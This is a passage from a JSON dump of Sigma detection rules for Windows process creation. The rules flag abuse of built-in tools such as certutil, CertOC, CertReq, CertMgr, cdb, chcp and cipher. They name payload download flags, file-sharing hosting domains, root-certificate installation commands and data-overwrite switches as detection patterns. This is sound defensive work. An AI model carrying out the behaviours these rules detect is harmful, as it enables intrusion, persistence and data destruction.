    "content": "title: Suspicious Calculator Usage\nid: 737e618a-a410-49b5-bec3-9e55ff7fbc15\nstatus: test\ndescription: |\n    Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.\nreferences:\n    - https://twitter.com/ItsReallyNick/status/1094080242686312448\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-02-09\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains: '\\calc.exe '\n    selection_2:\n        Image|endswith: '\\calc.exe'\n    filter_main_known_locations:\n        Image|contains:\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\WinSxS\\'\n    condition: selection_1 or ( selection_2 and not filter_main_known_locations )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cdb_arbitrary_command_execution.yml",
    "content": "title: Potential Binary Proxy Execution Via Cdb.EXE\nid: b5c7395f-e501-4a08-94d4-57fe7a9da9d2\nstatus: test\ndescription: Detects usage of \"cdb.exe\" to launch arbitrary processes or commands from a debugger script file\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/\n    - https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html\n    - https://twitter.com/nas_bench/status/1534957360032120833\nauthor: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-26\nmodified: 2024-04-22\ntags:\n    - attack.execution\n    - attack.t1106\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cdb.exe'\n        - OriginalFileName: 'CDB.Exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' -c ' # Using a debugger script\n            - ' -cf '\n    condition: all of selection*\nfalsepositives:\n    - Legitimate use of debugging tools\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certmgr_certificate_installation.yml",
    "content": "title: New Root Certificate Installed Via CertMgr.EXE\nid: ff992eac-6449-4c60-8c1d-91c9722a1d48\nrelated:\n    - id: 42821614-9264-4761-acfc-5772c3286f76\n      type: derived\n    - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc\n      type: obsolete\nstatus: test\ndescription: |\n    Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\n    Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md\n    - https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/\nauthor: oscd.community, @redcanary, Zach Stanford @svch0st\ndate: 2023-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all\n    selection_img:\n        - Image|endswith: '\\CertMgr.exe'\n        - OriginalFileName: 'CERTMGT.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/add'\n            - 'root'\n    condition: all of selection_*\nfalsepositives:\n    - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certoc_download.yml",
    "content": "title: File Download via CertOC.EXE\nid: 70ad0861-d1fe-491c-a45f-fa48148a300d\nrelated:\n    - id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a\n      type: similar\nstatus: test\ndescription: Detects when a user downloads a file by using CertOC.exe\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-16\nmodified: 2023-10-18\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certoc.exe'\n        - OriginalFileName: 'CertOC.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '-GetCACAPS'\n            - 'http'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certoc_download_direct_ip.yml",
    "content": "title: File Download From IP Based URL Via CertOC.EXE\nid: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a\nrelated:\n    - id: 70ad0861-d1fe-491c-a45f-fa48148a300d\n      type: similar\nstatus: test\ndescription: Detects when a user downloads a file from an IP based URL using CertOC.exe\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-18\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certoc.exe'\n        - OriginalFileName: 'CertOC.exe'\n    selection_ip:\n        CommandLine|re: '://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    selection_cli:\n        CommandLine|contains: '-GetCACAPS'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml",
    "content": "title: DLL Loaded via CertOC.EXE\nid: 242301bc-f92f-4476-8718-78004a6efd9f\nrelated:\n    - id: 84232095-ecca-4015-b0d7-7726507ee793\n      type: similar\nstatus: test\ndescription: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.\nreferences:\n    - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2\n    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/\nauthor: Austin Songer @austinsonger\ndate: 2021-10-23\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certoc.exe'\n        - OriginalFileName: 'CertOC.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -LoadDLL '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml",
    "content": "title: Suspicious DLL Loaded via CertOC.EXE\nid: 84232095-ecca-4015-b0d7-7726507ee793\nrelated:\n    - id: 242301bc-f92f-4476-8718-78004a6efd9f\n      type: similar\nstatus: test\ndescription: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.\nreferences:\n    - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2\n    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certoc.exe'\n        - OriginalFileName: 'CertOC.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -LoadDLL '\n    selection_paths:\n        CommandLine|contains:\n            - '\\Appdata\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Users\\Public\\'\n            - 'C:\\Windows\\Tasks\\'\n            - 'C:\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certreq_download.yml",
    "content": "title: Suspicious CertReq Command to Download\nid: 4480827a-9799-4232-b2c4-ccc6c4e9e12b\nstatus: experimental\ndescription: |\n    Detects a suspicious CertReq execution downloading a file.\n    This behavior is often used by attackers to download additional payloads or configuration files.\n    Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Certreq/\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-11-24\nmodified: 2025-10-29\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certreq.exe'\n        - OriginalFileName: 'CertReq.exe'\n    selection_cli_flag_post:\n        CommandLine|contains|windash: '-Post'\n    selection_cli_flag_config:\n        CommandLine|contains|windash: '-config'\n    selection_cli_http:\n        CommandLine|contains: 'http'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml",
    "content": "title: New Root Certificate Installed Via Certutil.EXE\nid: d2125259-ddea-4c1c-9c22-977eb5b29cf0\nrelated:\n    - id: 42821614-9264-4761-acfc-5772c3286f76\n      type: derived\n    - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc\n      type: obsolete\nstatus: test\ndescription: |\n    Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\n    Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md\nauthor: oscd.community, @redcanary, Zach Stanford @svch0st\ndate: 2023-03-05\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: certutil -addstore -f -user ROOT CertificateFileName.der\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli_add:\n        CommandLine|contains|windash: '-addstore'\n    selection_cli_store:\n        CommandLine|contains: 'root'\n    condition: all of selection_*\nfalsepositives:\n    - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_decode.yml",
    "content": "title: File Decoded From Base64/Hex Via Certutil.EXE\nid: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7\nstatus: test\ndescription: Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\n    - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\n    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/\n    - https://twitter.com/JohnLaTwC/status/835149808817991680\n    - https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil\n    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community\ndate: 2023-02-15\nmodified: 2025-06-04\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains|windash:\n            - '-decode ' # Decode Base64\n            - '-decodehex ' # Decode Hex\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_download.yml",
    "content": "title: Suspicious Download Via Certutil.EXE\nid: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b\nrelated:\n    - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829\n      type: similar\nstatus: test\ndescription: Detects the execution of certutil with certain flags that allow the utility to download files.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\n    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/\n    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/\n    - https://twitter.com/egre55/status/1087685529016193025\n    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n    - https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\nmodified: 2025-12-01\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_flags:\n        CommandLine|contains:\n            - 'urlcache '\n            - 'verifyctl '\n            - 'URL '\n    selection_http:\n        CommandLine|contains: 'http'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml",
    "content": "title: Suspicious File Downloaded From Direct IP Via Certutil.EXE\nid: 13e6fe51-d478-4c7e-b0f2-6da9b400a829\nrelated:\n    - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Generic download\n      type: similar\n    - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 # File sharing download\n      type: similar\nstatus: test\ndescription: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\n    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/\n    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/\n    - https://twitter.com/egre55/status/1087685529016193025\n    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n    - https://twitter.com/_JohnHammond/status/1708910264261980634\n    - https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\nmodified: 2025-12-01\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_flags:\n        CommandLine|contains:\n            - 'urlcache '\n            - 'verifyctl '\n            - 'URL '\n    selection_http:\n        CommandLine|contains:\n            - '://1'\n            - '://2'\n            - '://3'\n            - '://4'\n            - '://5'\n            - '://6'\n            - '://7'\n            - '://8'\n            - '://9'\n    # filter_local_ips:\n    #     # Note: Uncomment this filter if you want to exclude local IPs\n    #     CommandLine|contains:\n    #         - '://10.' # 10.0.0.0/8\n    #         - '://192.168.' # 192.168.0.0/16\n    #         - '://172.16.' # 172.16.0.0/12\n    #         - '://172.17.'\n    #         - '://172.18.'\n    #         - '://172.19.'\n    #         - '://172.20.'\n    #         - '://172.21.'\n    #         - '://172.22.'\n    #         - '://172.23.'\n    #         - '://172.24.'\n    #         - '://172.25.'\n    #         - '://172.26.'\n    #         - '://172.27.'\n    #         - '://172.28.'\n    #         - '://172.29.'\n    #         - '://172.30.'\n    #         - '://172.31.'\n    #         - '://127.' # 127.0.0.0/8\n    #         - '://169.254.' # 169.254.0.0/16\n    filter_main_seven_zip:\n        CommandLine|contains: '://7-' # For https://7-zip.org/\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml",
    "content": "title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE\nid: 42a5f1e7-9603-4f6d-97ae-3f37d130d794\nrelated:\n    - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Generic download\n      type: similar\n    - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 # Direct IP download\n      type: similar\nstatus: test\ndescription: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\n    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/\n    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/\n    - https://twitter.com/egre55/status/1087685529016193025\n    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\n    - https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_flags:\n        CommandLine|contains:\n            - 'urlcache '\n            - 'verifyctl '\n            - 'URL '\n    selection_http:\n        CommandLine|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_encode.yml",
    "content": "title: File Encoded To Base64 Via Certutil.EXE\nid: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a\nstatus: test\ndescription: Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\n    - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\n    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-02-24\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains|windash: '-encode'\n    condition: all of selection_*\nfalsepositives:\n    - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml",
    "content": "title: Suspicious File Encoded To Base64 Via Certutil.EXE\nid: ea0cdc3e-2239-4f26-a947-4e8f8224e464\nrelated:\n    - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a\n      type: derived\nstatus: test\ndescription: Detects the execution of certutil with the \"encode\" flag to encode a file to base64 where the extension of the file is suspicious\nreferences:\n    - https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior\n    - https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior\n    - https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior\n    - https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains|windash: '-encode'\n    selection_extension:\n        CommandLine|contains:\n            - '.acl'\n            - '.bat'\n            - '.doc'\n            - '.gif'\n            - '.jpeg'\n            - '.jpg'\n            - '.mp3'\n            - '.pdf'\n            - '.png'\n            - '.ppt'\n            - '.tmp'\n            - '.xls'\n            - '.xml'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml",
    "content": "title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE\nid: 82a6714f-4899-4f16-9c1e-9a333544d4c3\nrelated:\n    - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a\n      type: derived\nstatus: test\ndescription: Detects the execution of certutil with the \"encode\" flag to encode a file to base64 where the files are located in potentially suspicious locations\nreferences:\n    - https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior\n    - https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior\n    - https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior\n    - https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains|windash: '-encode'\n    selection_extension:\n        CommandLine|contains:\n            # Note: Add more suspicious locations to increase coverage\n            - '\\AppData\\Roaming\\'\n            - '\\Desktop\\'\n            - '\\Local\\Temp\\'\n            - '\\PerfLogs\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            - '$Recycle.Bin'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml",
    "content": "title: Certificate Exported Via Certutil.EXE\nid: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5\nstatus: test\ndescription: Detects the execution of certutil with the \"exportPFX\" flag which allows the utility to export certificates.\nreferences:\n    - https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains|windash: '-exportPFX '\n    condition: all of selection_*\nfalsepositives:\n    - There are legitimate reasons to export certificates. Investigate the activity to determine if it's benign\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml",
    "content": "title: Potential NTLM Coercion Via Certutil.EXE\nid: 6c6d9280-e6d0-4b9d-80ac-254701b64916\nstatus: test\ndescription: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/issues/243\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-01\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -syncwithWU '\n            - ' \\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml",
    "content": "title: Console CodePage Lookup Via CHCP\nid: 7090adee-82e2-4269-bd59-80691e7c6338\nstatus: test\ndescription: Detects use of chcp to look up the system locale value as part of host discovery\nreferences:\n    - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp\nauthor: _pete_0, TheDFIRReport\ndate: 2022-02-21\nmodified: 2024-03-05\ntags:\n    - attack.discovery\n    - attack.t1614.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\cmd.exe'\n        ParentCommandLine|contains|windash:\n            - ' -c '\n            - ' -r '\n            - ' -k '\n        Image|endswith: '\\chcp.com'\n        CommandLine|endswith:\n            - 'chcp'\n            - 'chcp '\n            - 'chcp  '\n    condition: selection\nfalsepositives:\n    - During an Anaconda update the 'conda.exe' process will eventually execute the 'chcp' command.\n    - Discord was seen using chcp to look up code pages\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml",
    "content": "title: Suspicious CodePage Switch Via CHCP\nid: c7942406-33dd-4377-a564-0f62db0593a3\nstatus: test\ndescription: Detects a code page switch in command line or batch scripts to a rare language\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers\n    - https://twitter.com/cglyer/status/1183756892952248325\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community\ndate: 2019-10-14\nmodified: 2023-03-07\ntags:\n    - attack.t1036\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\chcp.com'\n        CommandLine|endswith:\n            - ' 936'    # Chinese\n            # - ' 1256' # Arabic\n            - ' 1258'   # Vietnamese\n            # - ' 855'  # Russian\n            # - ' 866'  # Russian\n            # - ' 864'  # Arabic\n    condition: selection\nfalsepositives:\n    - Administrative activity (adjust code pages according to your organization's region)\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml",
    "content": "title: Deleted Data Overwritten Via Cipher.EXE\nid: 4b046706-5789-4673-b111-66f25fe99534\nstatus: test\ndescription: |\n    Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\n    Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\n    Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive\nauthor: frack113\ndate: 2021-12-26\nmodified: 2023-02-21\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'CIPHER.EXE'\n        - Image|endswith: '\\cipher.exe'\n    selection_cli:\n        CommandLine|contains: ' /w:'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Overwrite deleted data on C drive\n      technique: T1485\n      atomic_guid: 321fd25e-0007-417f-adec-33232252be19\n"
  },
  {
